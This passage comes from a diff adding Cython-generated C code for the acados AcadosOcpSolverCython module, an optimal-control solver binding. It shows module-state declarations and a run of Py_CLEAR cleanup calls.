*__pyx_n_s_get_stats; + PyObject *__pyx_n_s_getcwd; + PyObject *__pyx_n_s_getstate; + PyObject *__pyx_n_u_globalization; + PyObject *__pyx_n_u_globalization_use_SOC; + PyObject *__pyx_kp_u_got; + PyObject *__pyx_kp_u_got_differing_extents_in_dimensi; + PyObject *__pyx_n_s_i; + PyObject *__pyx_n_s_id; + PyObject *__pyx_n_s_import; + PyObject *__pyx_n_s_indent; + PyObject *__pyx_n_s_index; + PyObject *__pyx_n_u_initialize_t_slacks; + PyObject *__pyx_n_s_initializing; + PyObject *__pyx_n_s_int; + PyObject *__pyx_n_s_int_fields; + PyObject *__pyx_n_s_int_value; + PyObject *__pyx_n_s_is_coroutine; + PyObject *__pyx_kp_u_isenabled; + PyObject *__pyx_n_s_isfile; + PyObject *__pyx_n_s_itemsize; + PyObject *__pyx_kp_s_itemsize_0_for_cython_array; + PyObject *__pyx_n_u_iterate; + PyObject *__pyx_n_s_join; + PyObject *__pyx_n_s_json; + PyObject *__pyx_kp_u_json_2; + PyObject *__pyx_n_s_key; + PyObject *__pyx_n_s_keys; + PyObject *__pyx_n_u_lam; + PyObject *__pyx_n_u_lam_2; + PyObject *__pyx_n_u_lbu; + PyObject *__pyx_n_u_lbx; + PyObject *__pyx_n_u_line_search_use_sufficient_desce; + PyObject *__pyx_n_s_load; + PyObject *__pyx_n_s_load_iterate; + PyObject *__pyx_kp_u_load_iterate_failed_file_does_no; + PyObject *__pyx_n_s_m; + PyObject *__pyx_n_s_main; + PyObject *__pyx_n_s_mem_fields; + PyObject *__pyx_n_s_memview; + PyObject *__pyx_n_s_min_size; + PyObject *__pyx_n_s_mode; + PyObject *__pyx_n_s_model_name; + PyObject *__pyx_n_s_msg; + PyObject *__pyx_n_s_n; + PyObject *__pyx_n_s_name; + PyObject *__pyx_n_s_name_2; + PyObject *__pyx_n_s_ndim; + PyObject *__pyx_n_s_new; + PyObject *__pyx_n_s_new_time_steps; + PyObject *__pyx_n_s_nlp_solver_type; + PyObject *__pyx_kp_s_no_default___reduce___due_to_non; + PyObject *__pyx_n_s_np; + PyObject *__pyx_n_s_numpy; + PyObject *__pyx_kp_u_numpy_core_multiarray_failed_to; + PyObject *__pyx_kp_u_numpy_core_umath_failed_to_impor; + PyObject *__pyx_n_s_nx; + PyObject *__pyx_n_s_obj; + PyObject *__pyx_n_s_open; + PyObject *__pyx_n_s_options_set; + PyObject *__pyx_n_s_order; + PyObject *__pyx_n_s_os; + PyObject *__pyx_n_s_out; + PyObject *__pyx_n_s_out_fields; + PyObject *__pyx_n_s_out_mat; + PyObject *__pyx_n_s_overwrite; + PyObject *__pyx_n_u_p; + PyObject *__pyx_n_s_pack; + PyObject *__pyx_n_s_path; + PyObject *__pyx_n_u_pi; + PyObject *__pyx_n_u_pi_2; + PyObject *__pyx_n_s_pickle; + PyObject *__pyx_n_s_print; + PyObject *__pyx_n_u_print_level; + PyObject *__pyx_n_s_print_statistics; + PyObject *__pyx_n_s_pyx_PickleError; + PyObject *__pyx_n_s_pyx_checksum; + PyObject *__pyx_n_s_pyx_result; + PyObject *__pyx_n_s_pyx_state; + PyObject *__pyx_n_s_pyx_type; + PyObject *__pyx_n_s_pyx_unpickle_Enum; + PyObject *__pyx_n_s_pyx_vtable; + PyObject *__pyx_n_u_qp_iter; + PyObject *__pyx_n_u_qp_mu0; + PyObject *__pyx_n_s_qp_solver_cond_N; + PyObject *__pyx_n_u_qp_tau_min; + PyObject *__pyx_n_u_qp_tol_comp; + PyObject *__pyx_n_u_qp_tol_eq; + PyObject *__pyx_n_u_qp_tol_ineq; + PyObject *__pyx_n_u_qp_tol_stat; + PyObject *__pyx_n_u_qp_warm_start; + PyObject *__pyx_n_u_r; + PyObject *__pyx_n_s_range; + PyObject *__pyx_n_s_recompute; + PyObject *__pyx_n_s_reduce; + PyObject *__pyx_n_s_reduce_cython; + PyObject *__pyx_n_s_reduce_ex; + PyObject *__pyx_n_s_register; + PyObject *__pyx_n_b_res_comp; + PyObject *__pyx_n_b_res_eq; + PyObject *__pyx_n_b_res_ineq; + PyObject *__pyx_n_b_res_stat; + PyObject *__pyx_n_s_reset; + PyObject *__pyx_n_u_residuals; + PyObject *__pyx_n_u_rti_phase; + PyObject *__pyx_n_s_self; + PyObject *__pyx_n_s_set; + PyObject *__pyx_n_s_set_new_time_steps; + PyObject *__pyx_n_s_setstate; + PyObject *__pyx_n_s_setstate_cython; + PyObject *__pyx_n_s_shape; + PyObject *__pyx_n_s_size; + PyObject *__pyx_n_u_sl; + PyObject *__pyx_n_u_sl_2; + PyObject *__pyx_n_s_solution; + PyObject *__pyx_n_s_solve; + PyObject *__pyx_kp_u_solver_option_must_be_of_type_fl; + PyObject *__pyx_kp_u_solver_option_must_be_of_type_in; + PyObject *__pyx_kp_u_solver_option_must_be_of_type_st; + PyObject *__pyx_n_s_sort_keys; + PyObject *__pyx_n_s_spec; + PyObject *__pyx_n_s_split; + PyObject *__pyx_n_s_sqp_iter; + PyObject *__pyx_n_u_sqp_iter; + PyObject *__pyx_n_s_stage; + PyObject *__pyx_n_s_start; + PyObject *__pyx_n_s_stat_m; + PyObject *__pyx_n_u_stat_m; + PyObject *__pyx_n_s_stat_n; + PyObject *__pyx_n_u_stat_n; + PyObject *__pyx_n_u_statistics; + PyObject *__pyx_n_s_step; + PyObject *__pyx_n_u_step_length; + PyObject *__pyx_n_s_stop; + PyObject *__pyx_n_s_store_iterate; + PyObject *__pyx_n_s_store_iterate_locals_lambda; + PyObject *__pyx_kp_u_stored_current_iterate_in; + PyObject *__pyx_n_s_strftime; + PyObject *__pyx_kp_s_strided_and_direct; + PyObject *__pyx_kp_s_strided_and_direct_or_indirect; + PyObject *__pyx_kp_s_strided_and_indirect; + PyObject *__pyx_n_s_string_fields; + PyObject *__pyx_n_s_string_value; + PyObject *__pyx_kp_s_stringsource; + PyObject *__pyx_n_s_struct; + PyObject *__pyx_n_u_su; + PyObject *__pyx_n_u_su_2; + PyObject *__pyx_n_s_sys; + PyObject *__pyx_n_u_t; + PyObject *__pyx_n_u_t_2; + PyObject *__pyx_n_s_test; + PyObject *__pyx_kp_s_third_party_acados_acados_templa; + PyObject *__pyx_n_u_time_glob; + PyObject *__pyx_n_u_time_lin; + PyObject *__pyx_n_u_time_qp; + PyObject *__pyx_n_u_time_qp_solver_call; + PyObject *__pyx_n_u_time_qp_xcond; + PyObject *__pyx_n_u_time_reg; + PyObject *__pyx_n_u_time_sim; + PyObject *__pyx_n_u_time_sim_ad; + PyObject *__pyx_n_u_time_sim_la; + PyObject *__pyx_n_u_time_solution_sensitivities; + PyObject *__pyx_n_u_time_tot; + PyObject *__pyx_n_u_tol_comp; + PyObject *__pyx_n_u_tol_eq; + PyObject *__pyx_n_u_tol_ineq; + PyObject *__pyx_n_u_tol_stat; + PyObject *__pyx_n_s_tolist; + PyObject *__pyx_n_u_u; + PyObject *__pyx_n_u_u_2; + PyObject *__pyx_n_u_ubu; + PyObject *__pyx_n_u_ubx; + PyObject *__pyx_kp_s_unable_to_allocate_array_data; + PyObject *__pyx_kp_s_unable_to_allocate_shape_and_str; + PyObject *__pyx_n_s_unpack; + PyObject *__pyx_n_s_update; + PyObject *__pyx_n_s_update_qp_solver_cond_N; + PyObject *__pyx_n_s_utcnow; + PyObject *__pyx_kp_u_utf_8; + PyObject *__pyx_n_s_value; + PyObject *__pyx_n_s_value_2; + PyObject *__pyx_n_s_value_shape; + PyObject *__pyx_n_s_version_info; + PyObject *__pyx_n_u_w; + PyObject *__pyx_n_u_warm_start_first_qp; + PyObject *__pyx_kp_u_with_dimension; + PyObject *__pyx_kp_u_with_dimension_you_have; + PyObject *__pyx_n_b_x; + PyObject *__pyx_n_s_x; + PyObject *__pyx_n_u_x; + PyObject *__pyx_n_u_x_2; + PyObject *__pyx_n_u_xdot_guess; + PyObject *__pyx_n_u_y_ref; + PyObject *__pyx_kp_u_you_have; + PyObject *__pyx_n_u_yref; + PyObject *__pyx_n_u_z; + PyObject *__pyx_n_u_z_2; + PyObject *__pyx_n_u_z_guess; + PyObject *__pyx_n_s_zeros; + PyObject *__pyx_int_0; + PyObject *__pyx_int_1; + PyObject *__pyx_int_2; + PyObject *__pyx_int_3; + PyObject *__pyx_int_4; + PyObject *__pyx_int_6; + PyObject *__pyx_int_7; + PyObject *__pyx_int_112105877; + PyObject *__pyx_int_136983863; + PyObject *__pyx_int_184977713; + PyObject *__pyx_int_neg_1; + PyObject *__pyx_int_neg_5; + PyObject *__pyx_slice__5; + PyObject *__pyx_tuple__4; + PyObject *__pyx_tuple__8; + PyObject *__pyx_tuple__9; + PyObject *__pyx_slice__16; + PyObject *__pyx_tuple__10; + PyObject *__pyx_tuple__11; + PyObject *__pyx_tuple__12; + PyObject *__pyx_tuple__13; + PyObject *__pyx_tuple__17; + PyObject *__pyx_tuple__18; + PyObject *__pyx_tuple__19; + PyObject *__pyx_tuple__20; + PyObject *__pyx_tuple__21; + PyObject *__pyx_tuple__22; + PyObject *__pyx_tuple__23; + PyObject *__pyx_tuple__24; + PyObject *__pyx_tuple__25; + PyObject *__pyx_tuple__26; + PyObject *__pyx_tuple__27; + PyObject *__pyx_tuple__28; + PyObject *__pyx_tuple__30; + PyObject *__pyx_tuple__31; + PyObject *__pyx_tuple__32; + PyObject *__pyx_tuple__33; + PyObject *__pyx_tuple__34; + PyObject *__pyx_tuple__35; + PyObject *__pyx_tuple__36; + PyObject *__pyx_tuple__37; + PyObject *__pyx_tuple__38; + PyObject *__pyx_tuple__39; + PyObject *__pyx_tuple__41; + PyObject *__pyx_tuple__45; + PyObject *__pyx_tuple__47; + PyObject *__pyx_tuple__49; + PyObject *__pyx_tuple__51; + PyObject *__pyx_tuple__52; + PyObject *__pyx_tuple__55; + PyObject *__pyx_tuple__57; + PyObject *__pyx_tuple__58; + PyObject *__pyx_tuple__60; + PyObject *__pyx_tuple__62; + PyObject *__pyx_tuple__65; + PyObject *__pyx_tuple__67; + PyObject *__pyx_tuple__69; + PyObject *__pyx_tuple__71; + PyObject *__pyx_tuple__72; + PyObject *__pyx_tuple__74; + PyObject *__pyx_tuple__77; + PyObject *__pyx_tuple__79; + PyObject *__pyx_tuple__82; + PyObject *__pyx_codeobj__40; + PyObject *__pyx_codeobj__42; + PyObject *__pyx_codeobj__43; + PyObject *__pyx_codeobj__44; + PyObject *__pyx_codeobj__46; + PyObject *__pyx_codeobj__48; + PyObject *__pyx_codeobj__50; + PyObject *__pyx_codeobj__53; + PyObject *__pyx_codeobj__54; + PyObject *__pyx_codeobj__56; + PyObject *__pyx_codeobj__59; + PyObject *__pyx_codeobj__61; + PyObject *__pyx_codeobj__63; + PyObject *__pyx_codeobj__64; + PyObject *__pyx_codeobj__66; + PyObject *__pyx_codeobj__68; + PyObject *__pyx_codeobj__70; + PyObject *__pyx_codeobj__73; + PyObject *__pyx_codeobj__75; + PyObject *__pyx_codeobj__76; + PyObject *__pyx_codeobj__78; + PyObject *__pyx_codeobj__80; + PyObject *__pyx_codeobj__81; + PyObject *__pyx_codeobj__83; +} __pyx_mstate; + +#if CYTHON_USE_MODULE_STATE +#ifdef __cplusplus +namespace { + extern struct PyModuleDef __pyx_moduledef; +} /* anonymous namespace */ +#else +static struct PyModuleDef __pyx_moduledef; +#endif + +#define __pyx_mstate(o) ((__pyx_mstate *)__Pyx_PyModule_GetState(o)) + +#define __pyx_mstate_global (__pyx_mstate(PyState_FindModule(&__pyx_moduledef))) + +#define __pyx_m (PyState_FindModule(&__pyx_moduledef)) +#else +static __pyx_mstate __pyx_mstate_global_static = +#ifdef __cplusplus + {}; +#else + {0}; +#endif +static __pyx_mstate *__pyx_mstate_global = &__pyx_mstate_global_static; +#endif +/* #### Code section: module_state_clear ### */ +#if CYTHON_USE_MODULE_STATE +static int __pyx_m_clear(PyObject *m) { + __pyx_mstate *clear_module_state = __pyx_mstate(m); + if (!clear_module_state) return 0; + Py_CLEAR(clear_module_state->__pyx_d); + Py_CLEAR(clear_module_state->__pyx_b); + Py_CLEAR(clear_module_state->__pyx_cython_runtime); + Py_CLEAR(clear_module_state->__pyx_empty_tuple); + Py_CLEAR(clear_module_state->__pyx_empty_bytes); + Py_CLEAR(clear_module_state->__pyx_empty_unicode); + #ifdef __Pyx_CyFunction_USED + Py_CLEAR(clear_module_state->__pyx_CyFunctionType); + #endif + #ifdef __Pyx_FusedFunction_USED + Py_CLEAR(clear_module_state->__pyx_FusedFunctionType); + #endif + Py_CLEAR(clear_module_state->__pyx_ptype_7cpython_4type_type); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_dtype); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_flatiter); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_broadcast); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_ndarray); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_generic); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_number); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_integer); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_signedinteger); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_unsignedinteger); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_inexact); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_floating); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_complexfloating); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_flexible); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_character); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_ufunc); + Py_CLEAR(clear_module_state->__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython); + Py_CLEAR(clear_module_state->__pyx_type_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython); + Py_CLEAR(clear_module_state->__pyx_array_type); + Py_CLEAR(clear_module_state->__pyx_type___pyx_array); + Py_CLEAR(clear_module_state->__pyx_MemviewEnum_type); + Py_CLEAR(clear_module_state->__pyx_type___pyx_MemviewEnum); + Py_CLEAR(clear_module_state->__pyx_memoryview_type); + Py_CLEAR(clear_module_state->__pyx_type___pyx_memoryview); + Py_CLEAR(clear_module_state->__pyx_memoryviewslice_type); + Py_CLEAR(clear_module_state->__pyx_type___pyx_memoryviewslice); + Py_CLEAR(clear_module_state->__pyx_kp_u_); + Py_CLEAR(clear_module_state->__pyx_n_s_ASCII); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython___get_poin); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython___get_stat); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython___get_stat_2); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython___get_stat_3); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython___reduce_c); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython___setstate); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython__get_poin); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython__get_stat); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython__get_stat_2); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython__get_stat_3); + Py_CLEAR(clear_module_state->__pyx_kp_u_AcadosOcpSolverCython_constraint); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython_constraint_2); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython_cost_set); + Py_CLEAR(clear_module_state->__pyx_kp_u_AcadosOcpSolverCython_cost_set_m); + Py_CLEAR(clear_module_state->__pyx_kp_u_AcadosOcpSolverCython_does_not_s); + Py_CLEAR(clear_module_state->__pyx_kp_u_AcadosOcpSolverCython_does_not_s_2); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython_dynamics_g); + Py_CLEAR(clear_module_state->__pyx_kp_u_AcadosOcpSolverCython_eval_param); + Py_CLEAR(clear_module_state->__pyx_kp_u_AcadosOcpSolverCython_eval_param_2); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython_eval_param_3); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython_get); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython_get_cost); + Py_CLEAR(clear_module_state->__pyx_kp_u_AcadosOcpSolverCython_get_field); + Py_CLEAR(clear_module_state->__pyx_kp_u_AcadosOcpSolverCython_get_is_an); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython_get_residu); + Py_CLEAR(clear_module_state->__pyx_kp_u_AcadosOcpSolverCython_get_stage); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython_get_stats); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython_load_itera); + Py_CLEAR(clear_module_state->__pyx_kp_u_AcadosOcpSolverCython_options_se); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython_options_se_2); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython_print_stat); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython_reset); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython_set); + Py_CLEAR(clear_module_state->__pyx_kp_u_AcadosOcpSolverCython_set_is_not); + Py_CLEAR(clear_module_state->__pyx_kp_u_AcadosOcpSolverCython_set_mismat); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython_set_new_ti); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython_solve); + Py_CLEAR(clear_module_state->__pyx_kp_u_AcadosOcpSolverCython_solve_argu); + Py_CLEAR(clear_module_state->__pyx_kp_u_AcadosOcpSolverCython_solve_argu_2); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython_store_iter); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython_update_qp); + Py_CLEAR(clear_module_state->__pyx_kp_s_All_dimensions_preceding_dimensi); + Py_CLEAR(clear_module_state->__pyx_n_s_AssertionError); + Py_CLEAR(clear_module_state->__pyx_kp_s_Buffer_view_does_not_expose_stri); + Py_CLEAR(clear_module_state->__pyx_kp_s_Can_only_create_a_buffer_that_is); + Py_CLEAR(clear_module_state->__pyx_kp_s_Cannot_assign_to_read_only_memor); + Py_CLEAR(clear_module_state->__pyx_kp_s_Cannot_create_writable_memory_vi); + Py_CLEAR(clear_module_state->__pyx_kp_u_Cannot_index_with_type); + Py_CLEAR(clear_module_state->__pyx_kp_s_Cannot_transpose_memoryview_with); + Py_CLEAR(clear_module_state->__pyx_kp_s_Dimension_d_is_not_direct); + Py_CLEAR(clear_module_state->__pyx_n_s_Ellipsis); + Py_CLEAR(clear_module_state->__pyx_kp_s_Empty_shape_tuple_for_cython_arr); + Py_CLEAR(clear_module_state->__pyx_n_u_F); + Py_CLEAR(clear_module_state->__pyx_n_s_ImportError); + Py_CLEAR(clear_module_state->__pyx_kp_s_Incompatible_checksums_0x_x_vs_0); + Py_CLEAR(clear_module_state->__pyx_n_s_IndexError); + Py_CLEAR(clear_module_state->__pyx_kp_s_Index_out_of_bounds_axis_d); + Py_CLEAR(clear_module_state->__pyx_kp_s_Indirect_dimensions_not_supporte); + Py_CLEAR(clear_module_state->__pyx_kp_u_Invalid_mode_expected_c_or_fortr); + Py_CLEAR(clear_module_state->__pyx_kp_u_Invalid_shape_in_axis); + Py_CLEAR(clear_module_state->__pyx_n_s_MemoryError); + Py_CLEAR(clear_module_state->__pyx_kp_s_MemoryView_of_r_at_0x_x); + Py_CLEAR(clear_module_state->__pyx_kp_s_MemoryView_of_r_object); + Py_CLEAR(clear_module_state->__pyx_n_s_N); + Py_CLEAR(clear_module_state->__pyx_kp_u_None); + Py_CLEAR(clear_module_state->__pyx_n_s_NotImplementedError); + Py_CLEAR(clear_module_state->__pyx_n_b_O); + Py_CLEAR(clear_module_state->__pyx_kp_u_Out_of_bounds_on_buffer_access_a); + Py_CLEAR(clear_module_state->__pyx_n_s_PickleError); + Py_CLEAR(clear_module_state->__pyx_n_u_SQP); + Py_CLEAR(clear_module_state->__pyx_n_u_SQP_RTI); + Py_CLEAR(clear_module_state->__pyx_n_s_Sequence); + Py_CLEAR(clear_module_state->__pyx_kp_s_Step_may_not_be_zero_axis_d); + Py_CLEAR(clear_module_state->__pyx_kp_u_TODO); + Py_CLEAR(clear_module_state->__pyx_n_s_TypeError); + Py_CLEAR(clear_module_state->__pyx_kp_s_Unable_to_convert_item_to_object); + Py_CLEAR(clear_module_state->__pyx_n_s_ValueError); + Py_CLEAR(clear_module_state->__pyx_n_s_View_MemoryView); + Py_CLEAR(clear_module_state->__pyx_kp_u_Y_m_d_H_M_S_f); + Py_CLEAR(clear_module_state->__pyx_kp_u__14); + Py_CLEAR(clear_module_state->__pyx_n_u__15); + Py_CLEAR(clear_module_state->__pyx_kp_u__2); + Py_CLEAR(clear_module_state->__pyx_kp_u__29); + Py_CLEAR(clear_module_state->__pyx_n_s__3); + Py_CLEAR(clear_module_state->__pyx_kp_u__6); + Py_CLEAR(clear_module_state->__pyx_kp_u__7); + Py_CLEAR(clear_module_state->__pyx_n_s__84); + Py_CLEAR(clear_module_state->__pyx_n_s_abc); + Py_CLEAR(clear_module_state->__pyx_n_s_acados_template_acados_ocp_solve); + Py_CLEAR(clear_module_state->__pyx_n_s_allocate_buffer); + Py_CLEAR(clear_module_state->__pyx_n_u_alpha); + Py_CLEAR(clear_module_state->__pyx_n_u_alpha_min); + Py_CLEAR(clear_module_state->__pyx_n_u_alpha_reduction); + Py_CLEAR(clear_module_state->__pyx_kp_u_alpha_values_are_not_available_f); + Py_CLEAR(clear_module_state->__pyx_kp_u_and); + Py_CLEAR(clear_module_state->__pyx_n_s_array); + Py_CLEAR(clear_module_state->__pyx_n_s_ascontiguousarray); + Py_CLEAR(clear_module_state->__pyx_n_s_asfortranarray); + Py_CLEAR(clear_module_state->__pyx_n_s_asyncio_coroutines); + Py_CLEAR(clear_module_state->__pyx_kp_u_at_stage); + Py_CLEAR(clear_module_state->__pyx_n_s_base); + Py_CLEAR(clear_module_state->__pyx_n_s_c); + Py_CLEAR(clear_module_state->__pyx_n_u_c); + Py_CLEAR(clear_module_state->__pyx_n_s_class); + Py_CLEAR(clear_module_state->__pyx_n_s_class_getitem); + Py_CLEAR(clear_module_state->__pyx_n_s_cline_in_traceback); + Py_CLEAR(clear_module_state->__pyx_n_s_collections); + Py_CLEAR(clear_module_state->__pyx_kp_s_collections_abc); + Py_CLEAR(clear_module_state->__pyx_n_s_constraints_fields); + Py_CLEAR(clear_module_state->__pyx_n_s_constraints_set); + Py_CLEAR(clear_module_state->__pyx_kp_s_contiguous_and_direct); + Py_CLEAR(clear_module_state->__pyx_kp_s_contiguous_and_indirect); + Py_CLEAR(clear_module_state->__pyx_n_s_cost_fields); + Py_CLEAR(clear_module_state->__pyx_n_s_cost_set); + Py_CLEAR(clear_module_state->__pyx_n_s_count); + Py_CLEAR(clear_module_state->__pyx_n_s_datetime); + Py_CLEAR(clear_module_state->__pyx_n_s_default); + Py_CLEAR(clear_module_state->__pyx_n_s_dict); + Py_CLEAR(clear_module_state->__pyx_n_s_dims); + Py_CLEAR(clear_module_state->__pyx_kp_u_disable); + Py_CLEAR(clear_module_state->__pyx_n_s_double_fields); + Py_CLEAR(clear_module_state->__pyx_n_s_double_value); + Py_CLEAR(clear_module_state->__pyx_n_s_dtype); + Py_CLEAR(clear_module_state->__pyx_n_s_dtype_is_object); + Py_CLEAR(clear_module_state->__pyx_n_s_dump); + Py_CLEAR(clear_module_state->__pyx_n_s_dynamics_get); + Py_CLEAR(clear_module_state->__pyx_kp_u_enable); + Py_CLEAR(clear_module_state->__pyx_n_s_encode); + Py_CLEAR(clear_module_state->__pyx_n_s_enter); + Py_CLEAR(clear_module_state->__pyx_n_s_enumerate); + Py_CLEAR(clear_module_state->__pyx_n_u_eps_sufficient_descent); + Py_CLEAR(clear_module_state->__pyx_n_s_error); + Py_CLEAR(clear_module_state->__pyx_n_s_eval_param_sens); + Py_CLEAR(clear_module_state->__pyx_n_u_ex); + Py_CLEAR(clear_module_state->__pyx_n_s_exit); + Py_CLEAR(clear_module_state->__pyx_n_s_f); + Py_CLEAR(clear_module_state->__pyx_n_s_field); + Py_CLEAR(clear_module_state->__pyx_n_s_field_2); + Py_CLEAR(clear_module_state->__pyx_n_s_fields); + Py_CLEAR(clear_module_state->__pyx_n_s_filename); + Py_CLEAR(clear_module_state->__pyx_n_s_flags); + Py_CLEAR(clear_module_state->__pyx_n_s_float64); + Py_CLEAR(clear_module_state->__pyx_kp_u_for_field); + Py_CLEAR(clear_module_state->__pyx_n_s_format); + Py_CLEAR(clear_module_state->__pyx_n_s_fortran); + Py_CLEAR(clear_module_state->__pyx_n_u_fortran); + Py_CLEAR(clear_module_state->__pyx_n_s_full_stats); + Py_CLEAR(clear_module_state->__pyx_n_u_full_step_dual); + Py_CLEAR(clear_module_state->__pyx_kp_u_gc); + Py_CLEAR(clear_module_state->__pyx_n_s_get); + Py_CLEAR(clear_module_state->__pyx_n_s_get_cost); + Py_CLEAR(clear_module_state->__pyx_n_s_get_pointers_solver); + Py_CLEAR(clear_module_state->__pyx_n_s_get_residuals); + Py_CLEAR(clear_module_state->__pyx_n_s_get_stat_double); + Py_CLEAR(clear_module_state->__pyx_n_s_get_stat_int); + Py_CLEAR(clear_module_state->__pyx_n_s_get_stat_matrix); + Py_CLEAR(clear_module_state->__pyx_n_s_get_stats); + Py_CLEAR(clear_module_state->__pyx_n_s_getcwd); + Py_CLEAR(clear_module_state->__pyx_n_s_getstate); + Py_CLEAR(clear_module_state->__pyx_n_u_globalization); + Py_CLEAR(clear_module_state->__pyx_n_u_globalization_use_SOC); + Py_CLEAR(clear_module_state->__pyx_kp_u_got); + Py_CLEAR(clear_module_state->__pyx_kp_u_got_differing_extents_in_dimensi); + Py_CLEAR(clear_module_state->__pyx_n_s_i); + Py_CLEAR(clear_module_state->__pyx_n_s_id); + Py_CLEAR(clear_module_state->__pyx_n_s_import); + Py_CLEAR(clear_module_state->__pyx_n_s_indent); + Py_CLEAR(clear_module_state->__pyx_n_s_index); + Py_CLEAR(clear_module_state->__pyx_n_u_initialize_t_slacks); + Py_CLEAR(clear_module_state->__pyx_n_s_initializing); + Py_CLEAR(clear_module_state->__pyx_n_s_int); + Py_CLEAR(clear_module_state->__pyx_n_s_int_fields); + Py_CLEAR(clear_module_state->__pyx_n_s_int_value); + Py_CLEAR(clear_module_state->__pyx_n_s_is_coroutine); + Py_CLEAR(clear_module_state->__pyx_kp_u_isenabled); + Py_CLEAR(clear_module_state->__pyx_n_s_isfile); + Py_CLEAR(clear_module_state->__pyx_n_s_itemsize); + Py_CLEAR(clear_module_state->__pyx_kp_s_itemsize_0_for_cython_array); + Py_CLEAR(clear_module_state->__pyx_n_u_iterate); + Py_CLEAR(clear_module_state->__pyx_n_s_join); + Py_CLEAR(clear_module_state->__pyx_n_s_json); + Py_CLEAR(clear_module_state->__pyx_kp_u_json_2); + Py_CLEAR(clear_module_state->__pyx_n_s_key); + Py_CLEAR(clear_module_state->__pyx_n_s_keys); + Py_CLEAR(clear_module_state->__pyx_n_u_lam); + Py_CLEAR(clear_module_state->__pyx_n_u_lam_2); + Py_CLEAR(clear_module_state->__pyx_n_u_lbu); + Py_CLEAR(clear_module_state->__pyx_n_u_lbx); + Py_CLEAR(clear_module_state->__pyx_n_u_line_search_use_sufficient_desce); + Py_CLEAR(clear_module_state->__pyx_n_s_load); + Py_CLEAR(clear_module_state->__pyx_n_s_load_iterate); + Py_CLEAR(clear_module_state->__pyx_kp_u_load_iterate_failed_file_does_no); + Py_CLEAR(clear_module_state->__pyx_n_s_m); + Py_CLEAR(clear_module_state->__pyx_n_s_main); + Py_CLEAR(clear_module_state->__pyx_n_s_mem_fields); + Py_CLEAR(clear_module_state->__pyx_n_s_memview); + Py_CLEAR(clear_module_state->__pyx_n_s_min_size); + Py_CLEAR(clear_module_state->__pyx_n_s_mode); + Py_CLEAR(clear_module_state->__pyx_n_s_model_name); + Py_CLEAR(clear_module_state->__pyx_n_s_msg); + Py_CLEAR(clear_module_state->__pyx_n_s_n); + Py_CLEAR(clear_module_state->__pyx_n_s_name); + Py_CLEAR(clear_module_state->__pyx_n_s_name_2); + Py_CLEAR(clear_module_state->__pyx_n_s_ndim); + Py_CLEAR(clear_module_state->__pyx_n_s_new); + Py_CLEAR(clear_module_state->__pyx_n_s_new_time_steps); + Py_CLEAR(clear_module_state->__pyx_n_s_nlp_solver_type); + Py_CLEAR(clear_module_state->__pyx_kp_s_no_default___reduce___due_to_non); + Py_CLEAR(clear_module_state->__pyx_n_s_np); + Py_CLEAR(clear_module_state->__pyx_n_s_numpy); + Py_CLEAR(clear_module_state->__pyx_kp_u_numpy_core_multiarray_failed_to); + Py_CLEAR(clear_module_state->__pyx_kp_u_numpy_core_umath_failed_to_impor); + Py_CLEAR(clear_module_state->__pyx_n_s_nx); + Py_CLEAR(clear_module_state->__pyx_n_s_obj); + Py_CLEAR(clear_module_state->__pyx_n_s_open); + Py_CLEAR(clear_module_state->__pyx_n_s_options_set); + Py_CLEAR(clear_module_state->__pyx_n_s_order); + Py_CLEAR(clear_module_state->__pyx_n_s_os); + Py_CLEAR(clear_module_state->__pyx_n_s_out); + Py_CLEAR(clear_module_state->__pyx_n_s_out_fields); + Py_CLEAR(clear_module_state->__pyx_n_s_out_mat); + 